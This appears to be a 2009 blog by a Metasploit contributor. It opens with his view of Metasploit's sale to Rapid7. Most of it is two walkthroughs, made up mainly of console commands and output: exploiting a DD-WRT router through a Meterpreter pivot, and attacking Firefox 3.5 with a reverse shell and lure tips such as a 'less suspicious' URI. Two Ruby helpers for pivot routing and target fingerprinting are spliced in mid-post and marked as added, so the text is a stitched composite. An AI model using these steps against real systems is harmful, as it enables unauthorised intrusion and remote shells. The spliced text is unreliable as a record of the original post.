Opinions of a Contributor to Metasploit about the sale to Rapid7

Let me start by saying that these are the opinions of a contributor. To this day I have contributed 3 Auxiliary Modules and 16 Meterpreter scripts to the project, and I had the honor and privilege to present with HD at Defcon 17 in the Metasploit Track. I was initially in shock when I saw the news on my iPhone while stuck in traffic; when I saw the news I could not believe it, I thought it was a joke. When I got to my office I quickly checked the web pages and listened to the Risky Business Podcast where the acquisition was discussed, and read all of the tweets of people in favor and against it, their worries, rants and comments. After all of this, I came to the conclusion that this is a great thing for the project. For a long time this project has been the labor of love of the members of the Metasploit project, with very few active committers and submitters other than a handful, each putting in their own free time, sacrificing long nights, family time and money to work on the project. Some wrote code to scratch their own itch and solve problems they had; others just did it for the same motivation that has pushed hackers everywhere to write code, the fun of creating something and learning how stuff works. In my case I stopped doing penetration tests and security audits many years ago, and in December of last year I decided to get back into the game by sharing stuff on my blog and forums and turning a lot of the stuff I knew into tools and scripts. In that process I started writing code for Metasploit, and I never found in any other project a community so patient and willing to help. HD has given me tips that made me a better coder; he was always patient and courteous with me and other contributors, and the members of the team like Natron, ET, Chris Gates and MC have also always been helpful with each piece of code I wrote (which many times was ugly as hell).
HD is now a father, and as a dad of a little girl myself I know how hard it is to spend time coding to contribute to a community and sacrifice the precious time one has with something as precious as one's own child. What he did will give him more time to spend with his family and still work on the project he loves, and the same goes for some of the members of the Metasploit team. Here is a list of the advantages I see:

  • Code will have dedicated dev team to work on it.
  • More stable code base since more resources for testing will be available.
  • More exploits and features to come faster since there will be a dedicated team.
  • The side effect that other projects like Canvas, Core Impact and others will have a stronger competitor, thus pushing them to improve their products even more.
  • Support for pentesters and others that use the framework.

The fears I have seen expressed by many have been:

  • The code going private and closed source.
  • That many of the cool features and exploits will be charged for by Rapid7
  • That the community will disappear.

To this I answer: HD has put long hours and money into funding this project by himself, and he has expressed that he will continue to keep the project open source as well as support the community; to this I say he has more than earned our support and trust. I trust HD and hold him to his word. The project is under a BSD license, so the same community that has made Metasploit grow can fork it and keep it going, but for now my trust is in HD and the Dev team. So let's keep supporting the project by contributing, testing the code, reporting bugs and making this an even better framework. I do say I envy HD and Egyp7 from the team; they are now working full time on what they love, so I say to them and the rest of the Metasploit team congratulations and my best wishes.

Tactical Meterpreter Scripting Defcon 17 Presentation Video

Special thanks to Chris John Riley for getting me the video, the Pauldotcom Crew for their support and to HD for giving me the opportunity to present. I hope you guys enjoy it. My English was very bad and it was a bit rushed, since Adam Savage from Mythbusters took some of the time allocated to the Metasploit track and we had to rush it a bit to be able to present all the material.

Defcon 17 Tactical Meterpreter Scripting from Carlos Perez on Vimeo.


Using Metasploit DD-WRT Exploit Module Thru Pivot

Metasploit now has in the 3.3 Dev SVN an exploit for the embedded-device Linux distribution DD-WRT. This exploit module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. Some have argued that this exploit is of low impact since the distribution only listens for HTTP connections on the internal interface. In this example the exploit will be used through a pivot obtained from a client side exploit; from that foothold we will pivot, do discovery, fingerprint the device and exploit it. We will start by showing the IP of the attacker machine, receiving the Meterpreter shell and showing the target box's IP through a cmd shell:

msf > ifconfig eth0
[*] exec: ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:0e:7f:f9:12:62  
          inet addr:192.168.1.158  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20e:7fff:fef9:1262/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:55461 errors:0 dropped:0 overruns:0 frame:0
          TX packets:23899 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:58889891 (58.8 MB)  TX bytes:3107063 (3.1 MB)
          Interrupt:20 
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
msf exploit(handler) > 
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.100:1085)
msf exploit(handler) > session -i 1
[-] Unknown command: session.
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo 
Computer: AWINXP01
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter > execute -H -f -c -i -f cmd.exe
Process 1708 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\administrator\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 192.168.111.200
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.111.2
C:\Documents and Settings\administrator\Desktop>exit
meterpreter > 

Now we proceed to background this session and set a route through the session to the network behind the NAT router, using the information we gathered:

meterpreter > 
Background session 1? [y/N]  
msf exploit(handler) > 
msf exploit(handler) > route add 192.168.111.0 255.255.255.0 1
msf exploit(handler) > route print
Active Routing Table
====================
   Subnet             Netmask            Gateway    
   ------             -------            -------    
   192.168.111.0      255.255.255.0      Session 1  
msf exploit(handler) > 

Now that the route is created we can use the TCP Port Scanner Auxiliary Module to do a TCP scan of the default gateway of the target network:

msf exploit(handler) > use auxiliary/scanner/portscan/tcp 
msf auxiliary(tcp) > info
       Name: TCP Port Scanner
    Version: 6823
    License: Metasploit Framework License (BSD)
Provided by:
  hdm <hdm@metasploit.com>
  kris katterjohn <katterjohn@gmail.com>
Basic options:
  Name     Current Setting  Required  Description                                  
  ----     ---------------  --------  -----------                                  
  PORTS    1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)        
  RHOSTS                    yes       The target address range or CIDR identifier  
  THREADS  1                yes       The number of concurrent threads             
  TIMEOUT  1000             yes       The socket connect timeout in milliseconds   
Description:
  Enumerate open TCP services
msf auxiliary(tcp) > set PORTS 22,23,80,443
PORTS => 22,23,80,443
msf auxiliary(tcp) > set RHOSTS 192.168.111.2
RHOSTS => 192.168.111.2
msf auxiliary(tcp) > run
[*]  TCP OPEN 192.168.111.2:22
[*]  TCP OPEN 192.168.111.2:23
[*]  TCP OPEN 192.168.111.2:80
[*] Auxiliary module execution completed
msf exploit(handler) >

Since we are going through a Meterpreter TCP pivot it is important to keep the THREADS variable at 1, since Meterpreter is not multithreaded, and to limit the ports to those you want to target so as not to spend a large amount of time scanning. Now that we know which ports are open, we proceed to fingerprint one of the services by grabbing its banner with the connect command in Metasploit:

msf exploit(handler) > connect -c 1 192.168.111.2 23
[*] Connected to 192.168.111.2:23
DD-WRT v24 std (c) 2007 NewMedia-NET GmbH
Release: 01/26/07 (SVN revision: 5660M)
DD-WRTx86CI login: ^Cmsf exploit(handler) > 
msf exploit(handler) > 


As we can see, the Telnet login banner identifies the target machine as a DD-WRT box. We now proceed to load the exploit module, set a reverse netcat payload and set the other appropriate variables. Once we have run the exploit and a session is created, we run the Linux uname command to check the version of the device and to confirm that the shell is working:

msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec 
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat 
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 2222
LPORT => 2222
msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.111.2
RHOST => 192.168.111.2
msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 2 opened (192.168.1.158:2222 -> 192.168.1.100:4531)
uname -a
Linux DD-WRTx86CI 2.6.19.2dd-wrt #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown
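As an added example (not code from the original post or from the Metasploit project), the two information gathering steps above as one small Ruby helper: it parses the ipconfig output read through the cmd shell to derive the network and netmask for the route command and checks that the default gateway really lies inside that network, and it recognises the DD-WRT Telnet banner returned by connect. The sample ipconfig output and banner are constructed from the transcripts above; the function names are my own.

```ruby
require 'ipaddr'

# Constructed samples: the ipconfig output read through the Meterpreter cmd shell and
# the Telnet banner returned by the router in the connect step (both shown above).
SAMPLE_IPCONFIG = <<~OUT
  Windows IP Configuration
  Ethernet adapter Local Area Connection:
          Connection-specific DNS Suffix  . :
          IP Address. . . . . . . . . . . . : 192.168.111.200
          Subnet Mask . . . . . . . . . . . : 255.255.255.0
          Default Gateway . . . . . . . . . : 192.168.111.2
OUT
SAMPLE_BANNER = "DD-WRT v24 std (c) 2007 NewMedia-NET GmbH\n" \
                "Release: 01/26/07 (SVN revision: 5660M)\nDD-WRTx86CI login: "

# Turn the "Label . . . : value" lines of Windows XP ipconfig into a hash; lines with an
# empty value (the DNS suffix here) and lines without a colon are ignored.
def parse_ipconfig(text)
  fields = {}
  text.each_line do |line|
    m = line.match(/^\s*(?<label>[A-Za-z][A-Za-z\- ]*?)[ .]*:\s*(?<value>\S*)\s*$/)
    next if m.nil? || m[:value].empty?
    fields[m[:label].strip] = m[:value]
  end
  fields
end

# Derive the network and netmask the route needs from the host address, and sanity check
# that the default gateway (the first scan target, the NAT router) lies in that network.
def pivot_plan(ipconfig_text, session_id)
  f = parse_ipconfig(ipconfig_text)
  network = IPAddr.new(f['IP Address']).mask(f['Subnet Mask'])
  gateway = IPAddr.new(f['Default Gateway'])
  { network: network.to_s, netmask: f['Subnet Mask'], gateway: gateway.to_s,
    gateway_reachable: network.include?(gateway),
    route_cmd: "route add #{network} #{f['Subnet Mask']} #{session_id}" }
end

# Recognise a DD-WRT Telnet banner and pull out version, build, release date and SVN
# revision; returns nil for any other banner so the caller does not guess the device.
def parse_ddwrt_banner(banner)
  m = banner.match(/DD-WRT v(?<version>\S+) (?<build>\S+) .*?Release: (?<release>\S+) \(SVN revision: (?<svn>[^)]+)\)/m)
  return nil unless m
  { version: m[:version], build: m[:build], release: m[:release], svn_revision: m[:svn] }
end

if __FILE__ == $PROGRAM_NAME
  plan = pivot_plan(SAMPLE_IPCONFIG, 1)
  puts plan[:route_cmd]
  warn 'gateway is outside the routed network' unless plan[:gateway_reachable]
  p parse_ddwrt_banner(SAMPLE_BANNER)
end
```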

One advantage is that, since the shell is running through a Meterpreter session, all traffic leaving the target network toward the attacker's box is encrypted using SSL.

For more information on this vulnerability please check the following links:

http://www.securityfocus.com/bid/35742
http://www.milw0rm.com/exploits/9209

Metasploit Firefox 3.5 escape() Value Exploit has been Improved

The exploit covered in an earlier blog post, the Firefox 3.5 escape() return value memory corruption exploit that worked against Windows XP, has now been expanded to cover OSX 10.5.7, and it has been improved so that no script problem message requiring user interaction is shown. For use against an OSX target the attack might look something like this:

carlos@loki:~/svn/msf3-dev$ sudo nc -vv -l -p 80
[sudo] password for carlos: 
listening on [any] 80 ...
connect to [192.168.1.158] from carlos-perezs-computer.local [192.168.1.120] 58924
GET / HTTP/1.1
Host: 192.168.1.158
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
^C sent 0, rcvd 370

Here the target was initially tricked into connecting to a Netcat listener so we could look at the User-Agent string to identify the target OS and browser; this could also easily have been done by creating a fake web page, having the victim connect, and looking at the logs or a sniffer capture. We continue by launching Metasploit, selecting the exploit and payload, and setting the proper target:
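The User-Agent check described above, as an added Ruby example that is not part of the original post: it pulls the User-Agent header out of a captured request and reports which of the two platforms listed under show targets the client matches, or nil for anything else, which is the same check a defender can run over web server logs to find Firefox 3.5 clients still exposed to this bug. The request is constructed from the Netcat capture above, the "Windows NT 5.1" token is the standard Windows XP marker, and the function names are assumptions.

```ruby
# Constructed sample: the request the Netcat listener above captured from the Mac client.
SAMPLE_REQUEST = <<~REQ
  GET / HTTP/1.1
  Host: 192.168.1.158
  User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Connection: keep-alive
REQ

# The two platforms the module lists under "show targets".
TARGETS = {
  windows_xp: 'Firefox 3.5.0 on Windows XP SP0-SP3',
  macosx_intel: 'Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)'
}.freeze

# Pull the header block out of a raw HTTP request; header names are case-insensitive,
# so they are stored lower-cased. Stops at the blank line that ends the headers.
def parse_headers(raw)
  headers = {}
  raw.split(/\r?\n/).drop(1).each do |line|
    break if line.strip.empty?
    name, value = line.split(':', 2)
    headers[name.strip.downcase] = value.strip if value
  end
  headers
end

# Classify a User-Agent string: returns [firefox_version, os] with os one of
# :windows_xp ("Windows NT 5.1" is XP), :macosx_intel or :other; nil if not Firefox.
def classify_user_agent(ua)
  version = ua[%r{Firefox/([\d.]+)}, 1]
  return nil unless version
  os = if ua =~ /Windows NT 5\.1/ then :windows_xp
       elsif ua =~ /Intel Mac OS X 10[._]5/ then :macosx_intel
       else :other
       end
  [version, os]
end

# Name the module target a captured request matches, or nil when neither applies
# (other browsers, other Firefox versions, other operating systems).
def affected_platform(raw_request)
  ua = parse_headers(raw_request)['user-agent']
  return nil unless ua
  version, os = classify_user_agent(ua)
  return nil unless version && version.start_with?('3.5')
  TARGETS[os]
end
```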

carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole
                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|
       =[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 166 aux
msf > use exploit/multi/browser/firefox_escape_retval
msf exploit(firefox_escape_retval) >  show targets
Exploit targets:
   Id  Name                                      
   --  ----                                      
   0   Firefox 3.5.0 on Windows XP SP0-SP3       
   1   Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)  
msf exploit(firefox_escape_retval) > set TARGET 1
TARGET => 1
msf exploit(firefox_escape_retval) > set PAYLOAD osx/x86/vforkshell_reverse_tcp
PAYLOAD => osx/x86/vforkshell_reverse_tcp
msf exploit(firefox_escape_retval) > set LHOST 192.168.1.158
LHOST => 192.168.1.158

As can be seen, the payload selected was the vforkshell. One of the main advantages of this shell is that, since it uses the vfork() Unix call to spawn itself, it does not run under the exploited process, so when the target kills the hung browser we do not lose our shell access. Since we launched the exploit as root we can change the port the exploit listens on to port 80, making it easier to exploit a target behind a proxy or firewall, change the URI path to one less suspicious, and launch the exploit:

msf exploit(firefox_escape_retval) > set SRVPORT 80
SRVPORT => 80
msf exploit(firefox_escape_retval) > set URIPATH secretdocumets.html
URIPATH => secretdocumets.html
msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
msf exploit(firefox_escape_retval) > 
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/secretdocumets.html
[*]  Local IP: http://192.168.1.158:80/secretdocumets.html
[*] Server started.

Once the target connects to our exploit server it will be sent the exploit JavaScript code with the payload:

[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.120:52760...
[*] Command shell session 1 opened (192.168.1.158:4444 -> 192.168.1.120:52770)

Once the shell is created we can interact with it. One important thing to remember is that the environment variables set for the shell are those of the exploited process, so we will have to use the full path when calling certain commands:

msf exploit(firefox_escape_retval) > sessions -l
Active sessions
===============
  Id  Description    Tunnel                                     
  --  -----------    ------                                     
  1   Command shell  192.168.1.158:4444 -> 192.168.1.120:52770  
msf exploit(firefox_escape_retval) > sessions -i 1
[*] Starting interaction with 1...
id
uid=501(labuser) gid=501(labuser) groups=501(labuser),98(_lpadmin),81(_appserveradm),79(_appserverusr),80(admin)
uname -a
Darwin testmac.local 9.7.0 Darwin Kernel Version 9.7.0: Tue Mar 31 22:52:17 PDT 2009; root:xnu-1228.12.14~1/RELEASE_I386 i386
env
PWD=/sbin
SHLVL=1
_=/usr/bin/env
OLDPWD=/bin
/sbin/ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1 
	inet 127.0.0.1 netmask 0xff000000 
	inet6 ::1 prefixlen 128 
gif0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280
stf0: flags=0<> mtu 1280
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	ether 00:16:cb:9f:9e:11 
	media: autoselect status: inactive
	supported media: autoselect 10baseT/UTP <half-duplex> 10baseT/UTP <full-duplex> 10baseT/UTP <full-duplex,hw-loopback> 10baseT/UTP <full-duplex,flow-control> 100baseTX <half-duplex> 100baseTX <full-duplex> 100baseTX <full-duplex,hw-loopback> 100baseTX <full-duplex,flow-control> 1000baseT <full-duplex> 1000baseT <full-duplex,hw-loopback> 1000baseT <full-duplex,flow-control> none
fw0: flags=8802<BROADCAST,SIMPLEX,MULTICAST> mtu 2030
	lladdr 00:17:f2:ff:fe:71:a7:b4 
	media: autoselect <full-duplex> status: inactive
	supported media: autoselect <full-duplex>
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	inet6 fe80::217:f2ff:fe99:d7cf%en1 prefixlen 64 scopeid 0x6 
	inet 192.168.1.120 netmask 0xffffff00 broadcast 192.168.1.255
	ether 00:17:f2:99:d7:cf 
	media: autoselect status: active
	supported media: autoselect
en4: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	ether 00:16:cb:33:3e:50 
	media: autoselect status: inactive
	supported media: none autoselect 10baseT/UTP <half-duplex>
vmnet8: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	inet 192.168.187.1 netmask 0xffffff00 broadcast 192.168.187.255
	ether 00:50:56:c0:00:08 
vmnet1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	inet 192.168.38.1 netmask 0xffffff00 broadcast 192.168.38.255
	ether 00:50:56:c0:00:01 
exit
[*] Command shell session 1 closed.

This exploit will be added to the Browser Autopwn module in Metasploit after Defcon 17.